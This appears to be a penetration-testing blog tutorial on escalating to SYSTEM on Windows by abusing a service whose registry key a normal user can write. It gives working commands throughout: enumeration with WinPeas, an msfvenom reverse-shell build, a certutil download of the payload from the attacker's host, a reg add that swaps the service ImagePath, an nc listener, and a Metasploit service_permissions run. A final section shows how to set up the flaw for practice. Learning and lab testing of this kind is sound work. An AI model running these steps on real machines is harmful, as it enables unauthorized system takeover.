Windows registry contains important configuration information and settings for the system, applications, and users. If the permissions on certain registry keys are not set correctly, it can allow a non-administrative user to modify or write to critical registry keys, which can lead to privilege escalation. For example, if the permissions on the registry key “HKLM\SYSTEM\CurrentControlSet\Services\Apache” are not set correctly, a non-administrative user can change the application binary to their own executable.
What this post covers
- How to enumerate for Insecure Registry Permissions
- Exploiting the vulnerability with reg add
- Exploiting the vulnerability with metasploit
- How to replicate this vulnerability
Enumerate with WinPeas
Scenario: We just exploited a vulnerable FTP server and landed a shell as user1. Our next goal is to escalate privileges.
You can find WinPeas here
Host a python webserver on your Kali where the WinPeas executable is located.
Then, download the executable to Windows using certutil.exe
After its downloaded, run it with these options
winpeas.exe servicesinfoScrolling through the output, we can see that user1 has full control over the registry of the vulnserv service.
Lets enumerate the service a little.
sc qc vulnserv
Looking at the output above, we can see that the service starts with System privileges. The service is also configured to “AUTO_START” which means that the service starts every time the machine is restarted.
Our goal now is to change the “Binary path” to a reverse shell so that we get a shell as NT AUTHORITY/SYSTEM.
Before we jump into the exploit. Lets also make sure we can start the service or restart the machine itself since the service is on autostart.
whoami /priv
We seem to have “SeShutdownPrivilege” enabled. This will be useful later on!
Exploit 1 (Manually)
To exploit this, lets create a reverse shell using msfvenom
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.4.4 LPORT=53 -f exe > reverse.exe
Once the reverse shell is created, we need to bring it over to the Windows machine.
Lets host a python webserver on Kali where the reverse shell is located
python3 -m http.server 80
Then use certutil.exe to download the file to Windows
certutil.exe -urlcache -f http://192.168.4.4/reverse.exe reverse.exe
Once the reverse shell is downloaded, we can use reg add to set the binary path to the reverse shell.
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\vulnserv" /t REG_EXPAND_SZ /v ImagePath /d "C:\Users\user1\reverse.exe" /fNow if we check the service binary path, it’ll show the reverse shell executable
sc qc vulnserv
With everything in place, we can start a reverse shell on Kali
nc -lnvp 53
Now restart the Windows machine
shutdown /r
After a minute or so, we get a reverse shell on our Kali as NT Authority\SYSTEM
Exploit 2 (Metasploit and Meterpreter)
I want to mention that the metasploit way of exploiting this is a little limited. This is because metasploit isn’t able to exploit the vulnerability unless our user has direct permissions to restart the service. In our previous scenario we had to restart the entire machine in order to escalate privileges but metasploit doesn’t do that. So for this example, “user1” will have permissions to restart the service directly.
First thing we want to do is background our meterpreter session. Keep the session number in mind.
We’ll be using “exploit/windows/local/service_permissions” for this. Also, make sure you choose the proper payload. I’m using “windows/x64/meterpreter/reverse_tcp” because the Windows machine is x64 bit.
use exploit/windows/local/service_permissionsset payload windows/x64/meterpreter/reverse_tcp
Now configure the LHOST, LPORT and set the session to your previous meterpreter session number.
set LHOST 192.168.4.4set LPORT 443set session 1
You can check if the options are correct
Now run it with “exploit”. The shell takes a good bit of time to return, it took me about 3 minutes.
I personally prefer the first method since its faster and you have more control over what to name the reverse shell, where to place it, etc.
Replicate the Vulnerability
On the Windows machine, log in as an Administrator.
Open up command prompt and create a service
sc create vulnserv binPath="C:\Services\service.exe" start=auto
Now open up regedit and navigate to the service. From there, right click on the service and click Permissions.
Computer\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\vulnserv
Then click Add
Type in the name of a user when it asks you to enter the object name
Now click on that user and give them full control over the service. Make sure you click Apply after this.
If you want to grant a user privileges to start the service, use subinacl.exe
subinacl.exe /service vulnserv /grant=user1=PTOC
Be sure to share this post if you found it valuable!
